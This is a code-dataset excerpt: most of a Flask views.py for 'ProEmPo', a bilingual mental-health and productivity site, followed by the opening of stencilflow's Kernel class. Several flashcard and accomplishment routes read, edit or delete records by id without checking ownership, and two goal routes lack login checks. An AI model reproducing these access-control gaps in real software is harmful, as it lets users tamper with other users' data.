commit changes to the database\n db.session.add(task)\n db.session.delete(finished_task)\n db.session.commit()\n\n return jsonify({})\n\n\n@views.route('/return-task', methods=['POST'])\n@login_required\ndef return_task():\n task_data = json.loads(request.data)\n archived_task_id = task_data['archivedTaskId']\n\n archived_task = ArchivedTask.query.get(archived_task_id)\n\n if archived_task and archived_task.user_id == current_user.id and archived_task.was_completed == 0:\n # Create a Task with the same data and due date as the FinishedTask\n task = Task(data=archived_task.data, user_id=current_user.id, due_date=archived_task.due_date, due_time=archived_task.due_time, date=archived_task.date)\n\n # Add and commit changes to the database\n db.session.add(task)\n db.session.delete(archived_task)\n db.session.commit()\n\n elif archived_task and archived_task.user_id == current_user.id and archived_task.was_completed == 1:\n finished_task = FinishedTask(data=archived_task.data, user_id=current_user.id, due_date=archived_task.due_date, due_time=archived_task.due_time, date=archived_task.date)\n\n # Add and commit changes to the database\n db.session.add(finished_task)\n db.session.delete(archived_task)\n db.session.commit()\n\n\n return jsonify({})\n\n'''\n@views.route('/archive-task', methods=['POST'])\n@login_required\ndef archive_task():\n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n\n task = Task.query.get(task_id)\n\n if task and task.user_id == current_user.id:\n # Create an ArchivedTask with the same data, date, and due date as the original task\n archivedtask = ArchivedTask(data=task.data, user_id=current_user.id, due_date=task.due_date, date=task.date)\n\n # Delete the original task\n db.session.delete(task)\n db.session.commit()\n\n return jsonify({})\n'''\n@views.route('/About')\n@login_required\ndef about():\n if current_user.language == \"ro\":\n about = \"Despre Noi\"\n aboutDescription1 = \"Bine ati venit pe site-ul nostru! Misiunea noastră este să vă facem experiența online cât mai plăcută și informativă posibil cu privire la diferitele opțiuni de sănătate mintală și productivitate disponibile aici. Vă întrebați ce este ProEmPo? Ei bine, ai venit în locul potrivit! 
ProEmPo este un site web de sănătate mintală și productivitate conceput pentru a promova bunăstarea mintală, pentru a crește gradul de conștientizare cu privire la problemele de sănătate mintală și pentru a oferi resurse și sprijin. De asemenea, oferim resurse productive pentru cei care au nevoie să rămână concentrați pe îndeplinirea sarcinilor.\"\n aboutDescription2 = \"Echipa noastră este pasionată de furnizarea de conținut de înaltă calitate, care să răspundă nevoilor dumneavoastră. Lucrăm în mod constant pentru a îmbunătăți și extinde eforturile noastre pentru a ne asigura că aveți acces la cele mai relevante și interesante informații disponibile.\"\n aboutDescription3 = \"Vă mulțumim că ați vizitat site-ul nostru web și sperăm că îl găsiți util și captivant. Dacă aveți întrebări sau feedback, vă rugăm să nu ezitați \"\n contact = \"contactaţi-ne\"\n aboutDescription4 = \"Apreciem contribuția dvs. și așteptăm cu nerăbdare să auzim de la dvs.\"\n else:\n about = \"About Us\"\n aboutDescription1 = \"Welcome to our website! Our mission is to make your online experience as enjoyable and informative as possible on various mental health and productivity options available here. Are you wondering about what ProEmPo is? Well you came to the right place! ProEmPo is a mental health and productivity website designed to promote mental well-being, raise awareness about mental health issues, and provide resources and support. We also provide productive resources for those in need to stay focused on doing tasks.\"\n aboutDescription2 = \"Our team is passionate about delivering high-quality content that meets your needs. We are constantly working to improve and expand our efforts to ensure that you have access to the most relevant and interesting information available.\"\n aboutDescription3 = \"Thank you for visiting our website, and we hope you find it helpful and engaging. 
If you have any questions or feedback, please don't hesitate to \"\n contact = \"contact us\"\n aboutDescription4 = \"We value your input and look forward to hearing from you.\"\n return render_template(\"About.html\", user=current_user, about=about, aboutDescription1=aboutDescription1, aboutDescription2=aboutDescription2, aboutDescription3=aboutDescription3, contact=contact, aboutDescription4=aboutDescription4)\n\n@views.route('/settings')\n@login_required\ndef setting():\n \n if current_user.language == \"ro\":\n selectLanguage = \"Selectați limba preferată:\"\n title = \"Setări\"\n save = \"Salvează \"\n Categories = \"Categorii\"\n General = \"General\"\n Accessibility = \"Accesibilitate\"\n changeuser = \"Schimbă Utilizator\"\n username = \"Utilizator:\"\n changepass = \"Schimbare Parolă\"\n currentpass = \"Parolă Curentă\"\n newpass = \"Parolă Nouă\"\n confirmnewpass = \"Confirmare Parolă Nouă\"\n hidefeatures = \"Ascundeți Caracteristici\"\n selfhelp = \"Ajoutor Personal\"\n tasks = \"Sarcini\"\n dailycheckin = \"Verificare Zilnică\"\n reports = \"Rapoarte\"\n language = \"Limba\"\n oldesttonewest = \"Cel mai vechi la cel mai nou\"\n newesttooldest = \"Cel mai nou la cel mai vechi\"\n duedate = \"Data scadentă\"\n alphabetically = \"Alfabetic\"\n defaultsort = \"Sortare Implicită\"\n taskpage = \"Pagina de Sarcini\"\n starredAtTop = \"Afișați Sarcinile Cu Stea În Partea De Sus\"\n makeAllButtonsPurple = \"Faceți Toate Butoanele Violet\"\n player = \"Zgomot Alb\"\n homepage = \"Pagina Principală\"\n hidesecondhand = \"Ascunde Mâna a Doua\"\n hidequote = \"Ascunde Citatul Zilei\"\n else:\n selectLanguage = \"Select your preferred language:\"\n title = \"Settings\"\n save = \"Save\"\n Categories = \"Categories\"\n General = \"General\"\n Accessibility = \"Accessibility\"\n changeuser = \"Change Username\"\n username = \"Username:\"\n changepass = \"Change Password\"\n currentpass = \"Current Password\"\n newpass = \"New Password\"\n confirmnewpass = \"Confirm New Password\"\n hidefeatures = \"Hide Features\"\n selfhelp = \"Self Help\"\n tasks = \"Tasks\"\n dailycheckin = \"Daily Check-In\"\n reports = \"Reports\"\n language = \"Language\"\n oldesttonewest = \"Oldest to Newest\"\n newesttooldest = \"Newest to Oldest\"\n duedate = \"Due Date\"\n alphabetically = \"Alphabetically\"\n defaultsort = \"Default Sort\"\n taskpage = \"Task Page\"\n starredAtTop = \"Show Starred Tasks at Top\"\n makeAllButtonsPurple = \"Make All Buttons Purple\"\n player = \"Noise Player\"\n homepage = \"Home Page\"\n hidesecondhand = \"Hide Second Hand\"\n hidequote = \"Hide Quote of the Day\"\n return render_template(\"settings.html\",user=current_user, hidequote=hidequote,\n selectLanguage=selectLanguage, title=title, save=save, Categories=Categories, General=General, Accessibility=Accessibility,\n changepass=changepass, currentpass=currentpass, newpass=newpass, confirmnewpass=confirmnewpass, \n selfhelp=selfhelp, tasks=tasks, dailycheckin=dailycheckin, reports=reports, hidefeatures=hidefeatures,\n language=language, changeuser=changeuser, username=username, oldesttonewest=oldesttonewest, \n newesttooldest=newesttooldest, duedate=duedate, alphabetically=alphabetically, taskpage=taskpage, defaultsort=defaultsort, \n starredAtTop=starredAtTop, makeAllButtonsPurple=makeAllButtonsPurple, player=player, homepage=homepage, hidesecondhand=hidesecondhand)\n\n\n@views.route('/update_starred_at_top', methods=['POST'])\n@login_required\ndef update_starred_at_top():\n user = current_user\n data = request.get_json()\n 
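# Each settings toggle below expects a small JSON body with a single key, e.g. {\"value\": 1}.\n # A hypothetical client call (a sketch, not taken from this codebase): fetch('/update_starred_at_top',\n # {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({value: 1})})\n 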
new_value = data.get('value')\n user.starred_at_top = new_value\n db.session.commit()\n return jsonify({})\n\n@views.route('/update_make_all_buttons_purple', methods=['POST'])\n@login_required\ndef update_make_all_buttons_purple():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.make_all_buttons_purple = new_value\n db.session.commit()\n return jsonify({})\n\n@views.route('/update_hide_self_help', methods=['POST'])\n@login_required\ndef update_hide_self_help():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_self_help = new_value\n db.session.commit()\n return jsonify({})\n\n@views.route('/update_hide_quote', methods=['POST'])\n@login_required\ndef update_hide_quote():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_quote = new_value\n db.session.commit()\n return jsonify({})\n\n@views.route('/update_hide_second_hand', methods=['POST'])\n@login_required\ndef update_hide_second_hand():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_second_hand = new_value\n db.session.commit()\n return jsonify({})\n\n@views.route('/update_hide_player', methods=['POST'])\n@login_required\ndef update_hide_player():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_player = new_value\n db.session.commit()\n return jsonify({})\n\n@views.route('/update_hide_tasks', methods=['POST'])\n@login_required\ndef update_hide_tasks():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_tasks = new_value\n db.session.commit()\n return jsonify({})\n\n\n@views.route('/update_hide_journal', methods=['POST'])\n@login_required\ndef update_hide_journal():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_journal = new_value\n db.session.commit()\n return jsonify({})\n\n\n@views.route('/update_hide_reports', methods=['POST'])\n@login_required\ndef update_hide_reports():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_reports = new_value\n db.session.commit()\n return jsonify({})\n\n\n@views.route('/update_language', methods=['POST'])\n@login_required\ndef update_language():\n user = current_user\n data = request.get_json()\n new_language = data.get('language')\n user.language = new_language\n db.session.commit()\n return jsonify({})\n\n@views.route('/update_defaultsort', methods=['POST'])\n@login_required\ndef update_defaultsort():\n user = current_user\n data = request.get_json()\n new_defaultsort = data.get('defaultsort')\n user.defaultsort = new_defaultsort\n db.session.commit()\n return jsonify({})\n\n\n@views.route('/General')\n@login_required\ndef general():\n\n return render_template(\"General.html\", user=current_user)\n\n@views.route('/Accessibility')\n@login_required\ndef accessibility():\n return render_template(\"Accessibility.html\", user=current_user)\n\n\n@views.route('/Support', methods=['GET'])\ndef support():\n if current_user.language == \"ro\":\n supportTitle = \"Asistență\"\n\n else:\n supportTitle = \"Support\"\n support = Support.query.all()\n return render_template(\"Support.html\", user=current_user, supportTitle=supportTitle, support=support)\n\n@views.route('/submit_support', methods=['GET','POST'])\ndef submit_support_form():\n\n support_entries = []\n\n if request.method == 'POST':\n try:\n # Get form data\n new_title = request.form['issue_title']\n new_email = request.form['email']\n new_description = request.form['description']\n if current_user.is_authenticated:\n new_form = Support(user_id=current_user.username, issue_title=new_title, email=new_email, description=new_description)\n 
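# Anonymous visitors can still file a support ticket; it is stored under the\n # placeholder user id \"No User\" instead of a username.\n 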
else:\n new_form = Support(user_id=\"No User\", issue_title=new_title, email=new_email, description=new_description)\n \n db.session.add(new_form)\n db.session.commit()\n \n return render_template('thank_you.html', user=current_user)\n except Exception as e:\n print(\"An error occurred while saving the support submission:\", e)\n # Handle the error, log it, or take appropriate action\n flash('Failed to submit the support request', category='error')\n\n return render_template(\"Support.html\", support_entries=support_entries, user=current_user)\n\n\n@views.route('/ViewFlashcards', methods=[\"GET\", \"POST\"])\n@login_required\ndef show_flashcard():\n # gets all the cards from the selected user\n lesson_alias = aliased(Lesson)\n user_flashcards = (Card.query.join(lesson_alias).filter(lesson_alias.user_id == current_user.id))\n\n selected_lesson_id = request.args.get(\"lesson\")\n # gets the lesson associated with the card\n if request.method == 'POST':\n selected_lesson_id = request.form.get('lesson')\n if selected_lesson_id and selected_lesson_id != \"all\":\n user_flashcards = user_flashcards.filter(Card.lesson_id == selected_lesson_id)\n # lists out all the cards\n user_flashcards = user_flashcards.all()\n # filters all the available lessons by the user\n all_lessons = Lesson.query.filter_by(user_id=current_user.id)\n return render_template(\"viewFlashcards.html\", user=current_user, cards=user_flashcards, all_lessons=all_lessons, select_lesson=selected_lesson_id)\n\n\n@views.route('/CreateFlashcards', methods=[\"GET\", \"POST\"])\n@login_required\ndef new_flashcard():\n # gets all the lessons from the user\n \n if request.method == \"GET\":\n all_lessons = current_user.lessons\n return render_template(\"createFlashcards.html\", all_lessons=all_lessons, user=current_user)\n else:\n # Get the data from the form\n lesson_id = request.form[\"lesson\"]\n question = request.form[\"question\"]\n answer = request.form[\"answer\"]\n new_lesson_name = request.form[\"new_lesson_name\"]\n\n if lesson_id:\n # Gets the selected lesson from the user\n selected_lesson = Lesson.query.get(lesson_id)\n if not selected_lesson or selected_lesson.user_id != current_user.id:\n print(\"The selected lesson doesn't exist.\")\n return redirect(\"/CreateFlashcards\")\n elif new_lesson_name:\n # Create a new lesson if needed\n new_lesson = Lesson(name=new_lesson_name, user_id=current_user.id)\n db.session.add(new_lesson)\n db.session.commit()\n selected_lesson = new_lesson\n else:\n print(\"no lesson provided\")\n return redirect(\"/CreateFlashcards\")\n \n card = Card(question=question, lesson_id=selected_lesson.id, answer=answer)\n db.session.add(card)\n db.session.commit()\n\n return redirect(\"/CreateFlashcards\")\n\n@views.route('/DeleteFlashcard/<int:flashcard_id>', methods=[\"POST\"])\n@login_required\ndef delete_flashcard(flashcard_id):\n\n flashcard = Card.query.get(flashcard_id)\n\n db.session.delete(flashcard)\n db.session.commit()\n\n return redirect(\"/ViewFlashcards\")\n\n\n@views.route('/ViewFlashcards/<int:flashcard_id>')\n@login_required\ndef get_flashcard(flashcard_id):\n\n flashcard_id = request.view_args.get('flashcard_id')\n\n if flashcard_id is None:\n return \"Invalid request\"\n\n flashcard = Card.query.get(flashcard_id)\n\n if not flashcard:\n print('Flashcard not found')\n return redirect('/ViewFlashcards')\n \n return render_template(\"showFlashcard.html\", card=flashcard, user=current_user)\n\n\n@views.route('/EditFlashcard/<int:flashcard_id>', methods=[\"GET\", \"POST\"])\n@login_required\ndef edit_flashcard(flashcard_id):\n\n flashcard = Card.query.get(flashcard_id)\n\n if 
flashcard is None:\n flash(\"Flashcard not found\", \"error\")\n return redirect('/ViewFlashcards')\n\n if request.method == \"POST\":\n #get the new values and store them\n lesson_id = request.form.get(\"lesson\")\n question = request.form.get(\"question\")\n answer = request.form.get(\"answer\")\n\n #new flashcard values assigned \n flashcard.lesson_id = lesson_id\n flashcard.question = question\n flashcard.answer = answer\n\n db.session.commit()\n return redirect('/ViewFlashcards/' + str(flashcard_id))\n \n lessons = Lesson.query.filter_by(user_id=current_user.id).all()\n return render_template(\"editFlashcards.html\", card=flashcard, lessons=lessons, user=current_user)\n\n@views.route('/clear-all-completed-tasks', methods=['POST'])\n@login_required\ndef clear_all_completed_tasks():\n completed_tasks = FinishedTask.query.filter_by(user_id=current_user.id).all()\n\n for task in completed_tasks:\n archived_task = ArchivedTask(\n data=task.data,\n user_id=current_user.id,\n due_date=task.due_date,\n due_time=task.due_time,\n date=task.date,\n was_completed=1\n )\n\n db.session.add(archived_task)\n db.session.delete(task)\n\n db.session.commit()\n\n return jsonify({})\n\n\n\n@views.route('/player')\ndef player():\n playIcon=''\n pauseIcon=''\n\n if current_user.language == \"ro\":\n whitenoise = \"Zgomot Alb\"\n birdnoise = \"Zgomot de Păsări\"\n naturenoise = \"Zgomotul Naturii\"\n rainnoise = \"Zgomot de Ploaie\"\n oceannoise = \"Zgomot Ocean\"\n streamnoise = \"Zgomot de Râu\"\n underwaternoise = \"Zgomot Subacvatic\"\n timeplayingnoises = \"Timpul de Redare:\"\n else:\n whitenoise = \"White Noise\"\n birdnoise = \"Bird Noise\"\n naturenoise = \"Nature Noise\"\n rainnoise = \"Rain Noise\"\n oceannoise = \"Ocean Noise\"\n streamnoise = \"Stream Noise\"\n underwaternoise = \"Underwater Noise\"\n timeplayingnoises = \"Time Playing Noises:\"\n\n return render_template('player.html', user=current_user, playIcon=playIcon, pauseIcon=pauseIcon, whitenoise=whitenoise, birdnoise=birdnoise, naturenoise=naturenoise, rainnoise=rainnoise, oceannoise=oceannoise, streamnoise=streamnoise, underwaternoise=underwaternoise, timeplayingnoises=timeplayingnoises)\n\n\n\n\n@views.route('/goals')\n@login_required\ndef goals():\n user_id = current_user.id\n previous_goals = Goal.query.filter_by(user_id=user_id).all()\n if previous_goals is None:\n previous_goals = [] \n\n if current_user.language == \"ro\":\n mygoals=\"Obiectivele Mele\"\n specific = \"Specific\"\n measurable = \"Măsurabil\"\n achievable=\"Realizabil\"\n relevant=\"Relevant\"\n timely=\"Oportun\"\n specificQ=\"Ce obiectiv voi realiza?\"\n measurableQ=\"Cum o să ştiu că am realizat obiectivul?\"\n achievableQ=\"Obiectivul este realist?\"\n relevantQ=\"De ce este obiectul acesta important?\"\n timelyQ=\"Când voi realiza acest obiectiv?\"\n saveGoal=\"Salvează obiectivul\"\n goalCompleted=\"Obiectiv Terminat\"\n seeAllGoals=\"Vizualizează toate obiectivele\"\n explanation1=\"Când vine vorba de stabilirea obiectivelor, Proempo adoptă abordarea 'smart' a obiectivelor. 
Abordarea obiectivelor SMART este un cadru profesional de stabilire a obiectivelor cu cinci componente esențiale:\"\n explanation2=\"Specific: Obiectivele trebuie să fie clare și bine definite\"\n explanation3=\"Măsurabile: obiectivele ar trebui să fie cuantificabile\"\n explanation4=\"Realizabil: Obiectivele ar trebui să fie realiste\"\n explanation5=\"Relevant: Obiectivele ar trebui să se alinieze cu obiectivele și valorile dumneavoastră.\"\n explanation6=\"Oportune: obiectivele ar trebui să aibă un interval de timp definit\"\n explanation7=\"Acest cadru îmbunătățește precizia și eficacitatea stabilirii obiectivelor.\"\n answerhere = \"Răspunde aici\"\n goalsAll = \"Toate Obiectivele\"\n else:\n mygoals=\"My Goals\"\n specific = \"Specific\"\n measurable = \"Measurable\"\n achievable=\"Achievable\"\n relevant=\"Relevant\"\n timely=\"Timely\"\n specificQ=\"What goal will I accomplish?\"\n measurableQ=\"How do I know when I reach this goal?\"\n achievableQ=\"Is this goal realistic with commitment?\"\n relevantQ=\"Why is this goal significant to me?\"\n timelyQ=\"When will I achieve this goal?\"\n saveGoal=\"Save My Goal\"\n goalCompleted=\"Goal Completed\"\n seeAllGoals=\"See all goals\"\n explanation1=\"When it comes to goal-setting, Proempo adopts the 'smart' goal approach. The SMART goal approach is a professional goal-setting framework with five essential components:\"\n explanation2=\"Specific: Goals must be clear and well-defined.\"\n explanation3=\"Measurable: Goals should be quantifiable and trackable.\"\n explanation4=\"Achievable: Goals should be realistic and attainable.\"\n explanation5=\"Relevant: Goals should align with your objectives and values.\"\n explanation6=\"Timely: Goals should have a defined time frame.\"\n explanation7=\"This framework enhances goal-setting precision and effectiveness.\"\n answerhere = \"Answer here\"\n goalsAll = \"All Goals\"\n return render_template('goals.html', user=current_user, previous_goals=previous_goals, \n mygoals=mygoals, specific=specific, measurable=measurable, achievable=achievable, relevant=relevant, \n timely=timely, specificQ=specificQ, measurableQ=measurableQ, achievableQ=achievableQ, relevantQ=relevantQ,\n timelyQ=timelyQ, saveGoal=saveGoal, goalCompleted=goalCompleted, seeAllGoals=seeAllGoals, \n explanation6=explanation6, explanation1=explanation1, explanation2=explanation2, \n explanation3=explanation3, explanation4=explanation4, explanation5 = explanation5, \n explanation7 = explanation7, answerhere=answerhere, goalsAll=goalsAll)\n\n\n\n@views.route('/save_goal', methods=['POST'])\ndef save_goal():\n try:\n data = request.json\n user_id = current_user.id\n specific = data.get('specific')\n measurable = data.get('measurable')\n achievable = data.get('achievable')\n relevant = data.get('relevant')\n timely = data.get('timely')\n status = data.get('status')\n\n goal_entry = Goal(\n user_id=user_id,\n specific=specific,\n measurable=measurable,\n achievable=achievable,\n relevant=relevant,\n timely=timely,\n status=status\n )\n\n db.session.add(goal_entry)\n db.session.commit()\n\n return jsonify({'message': 'Goal entry saved successfully'})\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Failed to save goal entry'}), 500\n\n\n@views.route('/complete_goal/<int:goal_id>', methods=['PUT'])\ndef complete_goal(goal_id):\n try:\n goal = Goal.query.filter_by(id=goal_id, user_id=current_user.id).first()\n\n if goal:\n goal.status = \"C\"\n db.session.commit()\n return jsonify({'message': 'Goal marked as completed 
successfully'})\n else:\n return jsonify({'message': 'Goal not found or does not belong to the current user'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Failed to mark goal as completed'}), 500\n \n\n\n@views.route('/fetch_goals', methods=['GET'])\n@login_required\ndef fetch_goals():\n user_id = current_user.id\n goals = Goal.query.filter_by(user_id=user_id).all()\n\n # Serialize the goals to JSON\n serialized_goals = []\n for goal in goals:\n serialized_goal = {\n 'id': goal.id,\n 'specific': goal.specific,\n 'measurable': goal.measurable,\n 'achievable': goal.achievable,\n 'relevant': goal.relevant,\n 'timely': goal.timely,\n 'status': goal.status\n }\n serialized_goals.append(serialized_goal)\n\n return jsonify({'goals': serialized_goals})\n\n\ndef get_iso_year_week(date):\n year, week, _ = date.isocalendar()\n return year, week\n\n@views.route('/accomplishments', methods=['GET', 'POST'])\n@login_required\ndef pride():\n if current_user.language == \"ro\":\n accomplishmentsTitle = \"Realizări\"\n accomplishmentsDescription1 = \"Fă-ți timp pentru a reflecta asupra realizărilor și calităților care te fac să fii mândru de tine.\"\n accomplishmentsDescription2 = \"Îmbrățișarea călătoriei tale este un proces unic și continuu, unul care se referă la tine.\"\n accomplishmentsDescription3 = \"Enumerați mai jos până la 5 calități de care sunteți mândru și reveniți pe această pagină când vă simțiți dezamăgiți.\"\n accomplishmentsDescription4 = \"Ține minte: ești capabil de lucruri minunate.\"\n accomplishmentsQuestion = \"De ce esti mandru?\"\n saveAccomplishments = \"Salvați\"\n proud = \"Sunt mândru de...\"\n placeholder = \"Enumerați aici de ce sunteți mândru...\"\n accomplishmentsWarning = \"Sigur vrei să ștergi această postare?\"\n else:\n accomplishmentsTitle = \"Accomplishments\"\n accomplishmentsDescription1 = \"Take some time to reflect on the accomplishments and qualities that make you proud of yourself.\"\n accomplishmentsDescription2 = \"Embracing your journey is a unique and ongoing process, one that's all about you.\"\n accomplishmentsDescription3 = \"List up to 5 qualities that you are proud of below and come back to this page when you are feeling down.\"\n accomplishmentsDescription4 = \"Remember: you are capable of wonderful things.\"\n accomplishmentsQuestion = \"What are you proud of?\"\n saveAccomplishments = \"Save\"\n proud = \"I am proud of...\"\n placeholder = \"List what you are proud of here...\"\n accomplishmentsWarning = \"Are you sure you want to delete this post?\"\n current_year, current_week_number = get_iso_year_week(today)\n\n recent_accomplishments = Pride.query.filter(\n Pride.user_id == current_user.id,\n Pride.year == current_year,\n Pride.week_number == current_week_number,\n Pride.status == False\n ).all()\n\n\n for accomplishment in recent_accomplishments:\n #Update the status once it lands outside the current week\n if current_week_number - accomplishment.week_number > 0:\n accomplishment.status = True \n \n if request.method == 'POST':\n #max entries for the week check\n maximum_entries = 5\n entries_for_week = len(recent_accomplishments)\n\n if entries_for_week >= maximum_entries:\n flash(\"You have entered the maximum number of entries. 
Only 5 per week\")\n else:\n new_moment = request.form.get('moment')\n pride_entry = Pride(\n user_id=current_user.id,\n moment=new_moment,\n year=current_year,\n week_number=current_week_number,\n status=False,\n )\n\n db.session.add(pride_entry)\n db.session.commit()\n \n recent_accomplishments = Pride.query.filter(\n Pride.user_id == current_user.id,\n Pride.year == current_year,\n Pride.week_number == current_week_number,\n Pride.status == False\n ).all()\n \n return render_template('pride.html', recent_accomplishments=recent_accomplishments, \n user=current_user, accomplishmentsTitle=accomplishmentsTitle, \n accomplishmentsDescription1=accomplishmentsDescription1, accomplishmentsDescription2=accomplishmentsDescription2,\n accomplishmentsDescription3=accomplishmentsDescription3, accomplishmentsDescription4=accomplishmentsDescription4,\n accomplishmentsQuestion=accomplishmentsQuestion, saveAccomplishments=saveAccomplishments, proud=proud, \n placeholder=placeholder, accomplishmentsWarning=accomplishmentsWarning)\n \n\n@views.route('/DeletePride/<int:pride_id>', methods=[\"POST\"])\n@login_required\ndef delete_pride(pride_id):\n\n moment=Pride.query.get(pride_id)\n db.session.delete(moment)\n db.session.commit()\n \n return redirect(url_for('views.pride'))\n \n@views.route('/past-accomplishments', methods=['GET', 'POST'])\n@login_required\ndef past_week_accomplishments():\n\n error_message = \"\"\n\n past_accomplishments = Pride.query.filter(\n Pride.user_id == current_user.id,\n Pride.status == True\n ).order_by(Pride.date.desc()).limit(5).all()\n\n if not past_accomplishments:\n error_message = \"You haven't listed any accomplishments in the past week\"\n\n return render_template('pastAccomplishments.html', past_accomplishments=past_accomplishments,error_message=error_message, user=current_user)","repo_name":"sategf/proempo-fl","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":77192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"31143387207","text":"#!/usr/bin/env python3\n\n\"\"\"\n The Kernel class is a subclass of the BaseKernelNodeClass and represents the actual kernel node in the\n KernelChainGraph. This class is able to read from its predecessors, process the data according to the stencil expression\n and write the result to the successor channels. In addition, it analyses the buffer sizes and latencies of the\n computation according to the defined latencies.\n\"\"\"\n\n__author__ = \"Andreas Kuster (kustera@ethz.ch)\"\n__copyright__ = \"BSD 3-Clause License\"\n\nimport functools\nimport operator\nfrom typing import List, Dict\n\nimport dace.dtypes\n\nimport stencilflow\nfrom stencilflow.base_node_class import BaseKernelNodeClass, BaseOperationNodeClass\nfrom stencilflow.bounded_queue import BoundedQueue\nfrom stencilflow.calculator import Calculator\nfrom stencilflow.compute_graph import ComputeGraph\nfrom stencilflow.compute_graph import Name, Num, BinOp, Call, Output, Subscript, Ternary, Compare, UnaryOp\n\n\nclass Kernel(BaseKernelNodeClass):\n\n def __init__(self,\n name: str,\n kernel_string: str,\n dimensions: List[int],\n data_type: dace.dtypes.typeclass,\n boundary_conditions: Dict[str, Dict[str, str]],\n raw_inputs,\n vectorization: int = 1,\n plot_graph: bool = False,\n verbose: bool = False) -> None:\n \"\"\"\n\n :param name: name of the kernel\n :param kernel_string: mathematical expression representing the stencil computation\n :param dimensions: global dimensions / problem size (i.e. 
size of the input array\n :param data_type: data type of the result produced by this kernel\n :param boundary_conditions: dictionary of the boundary condition for each input channel/field\n :param plot_graph: flag indicating whether the underlying graph is being drawn\n :param verbose: flag for console output logging\n \"\"\"\n # initialize the superclass\n super().__init__(name, BoundedQueue(name=\"dummy\", maxsize=0), data_type)\n # store arguments\n self.kernel_string: str = kernel_string # raw kernel string input\n self.raw_inputs = raw_inputs\n self.dimensions: List[\n int] = dimensions # input array dimensions [dimX, dimY, dimZ]\n self.boundary_conditions: Dict[str, Dict[\n str, str]] = boundary_conditions # boundary_conditions[field_name]\n self.verbose = verbose\n self.vectorization = vectorization\n # read static parameters from config\n self.config: Dict = stencilflow.parse_json(\"kernel.config\")\n self.calculator: Calculator = Calculator()\n # set simulator initial parameters\n self.all_available = False\n self.not_available = set()\n # analyze input\n self.graph: ComputeGraph = ComputeGraph(vectorization=vectorization,\n dimensions=dimensions,\n raw_inputs=raw_inputs)\n self.graph.generate_graph(\n kernel_string\n ) # generate the ast computation graph from the mathematical expression\n self.graph.calculate_latency(\n ) # calculate the latency in the computation tree to find the critical path\n self.graph.determine_inputs_outputs(\n ) # sort out input nodes (field accesses and constant values) and output\n # nodes\n self.graph.setup_internal_buffers()\n # set plot path (if plot is set to True)\n if plot_graph:\n self.graph.plot_graph(name + \".png\")\n # init sim specific params\n self.var_map: Dict[str, float] = dict(\n ) # mapping between variable names and its (current) value: var_map[var_name] =\n # var_value\n self.read_success: bool = False # flag indicating if read has been successful from all input nodes (=> ready\n # to execute)\n self.exec_success: bool = False # flag indicating if the execution has been successful\n self.result: float = float(\n 'nan'\n ) # execution result of current iteration (see program counter)\n self.outputs: Dict[str, BoundedQueue] = dict()\n # output delay queue: for simulation of calculation latency, fill it up with bubbles\n self.out_delay_queue: BoundedQueue = BoundedQueue(\n name=\"delay_output\",\n maxsize=self.graph.max_latency + 1,\n collection=[None] * self.graph.max_latency)\n # setup internal buffer queues\n self.internal_buffer: Dict[str, BoundedQueue] = dict()\n self.setup_internal_buffers()\n # this method takes care of the (falsely) executed kernel in case of not having a field access at [0,0,0]\n # present and the implication that there might be only fields out of bound s.t. 
there is a result produced,\n # but there should not be a result yet (see paper example ref# TODO)\n self.dist_to_center: Dict = dict()\n self.set_up_dist_to_center()\n self.center_reached = False\n # add performance metric fields\n self.max_del_buf_usage = dict()\n # for mean\n self.buf_usage_sum = dict()\n self.buf_usage_num = dict()\n self.init_metric = False\n self.PC_exec_start = stencilflow.convert_3d_to_1d(\n dimensions=self.dimensions, index=self.dimensions) # upper bound\n self.PC_exec_end = 0 # lower bound\n\n def print_kernel_performance(self):\n \"\"\"\n Print performance metric data.\n \"\"\"\n print(\"#############################\")\n for input in set(self.inputs).union(set(self.outputs)):\n print(\"#############################\")\n print(\"input buffer name: {}\".format(input))\n print(\"max buffer usage: {}\".format(self.max_del_buf_usage[input]))\n print(\"average buffer usage: {}\".format(self.buf_usage_sum[input] /\n self.buf_usage_num[input]))\n print(\"total execution time (from first exec to last): {}\".format(\n self.PC_exec_end - self.PC_exec_start))\n\n def update_performance_metric(self):\n \"\"\"\n Update buffer size values for performance evalution purpose.\n \"\"\"\n # check if dict has been initialized\n if not self.init_metric:\n # init all keys\n for input in self.inputs:\n self.max_del_buf_usage[input] = 0\n self.buf_usage_num[input] = 0\n self.buf_usage_sum[input] = 0\n for output in self.outputs:\n self.max_del_buf_usage[output] = 0\n self.buf_usage_num[output] = 0\n self.buf_usage_sum[output] = 0\n # update maximum delay buf usage\n # inputs\n for input in self.inputs:\n buffer = self.inputs[input]\n self.max_del_buf_usage[input] = max(\n self.max_del_buf_usage[input],\n len([x for x in buffer['delay_buffer'].queue if x is not None]))\n self.buf_usage_num[input] += 1\n self.buf_usage_sum[input] += len(\n [x for x in buffer['delay_buffer'].queue if x is not None])\n # outputs\n for output in self.outputs:\n buffer = self.outputs[output]\n self.max_del_buf_usage[output] = max(\n self.max_del_buf_usage[output],\n len([x for x in buffer['delay_buffer'].queue if x is not None]))\n self.buf_usage_num[output] += 1\n self.buf_usage_sum[output] += len(\n [x for x in buffer['delay_buffer'].queue if x is not None])\n\n def set_up_dist_to_center(self):\n \"\"\"\n Computes for all fields/channels the distance from the furthest field access to the center of the stencil\n ([0,0,0,]).\n \"\"\"\n for item in self.graph.accesses:\n furthest = max(self.graph.accesses[item])\n self.dist_to_center[item] = stencilflow.convert_3d_to_1d(\n dimensions=self.dimensions, index=furthest)\n\n def iter_comp_tree(self,\n node: BaseOperationNodeClass,\n index_relative_to_center=True,\n replace_negative_index=False,\n python_syntax=False,\n flatten_index=True,\n output_dimensions=None) -> str:\n \"\"\"\n 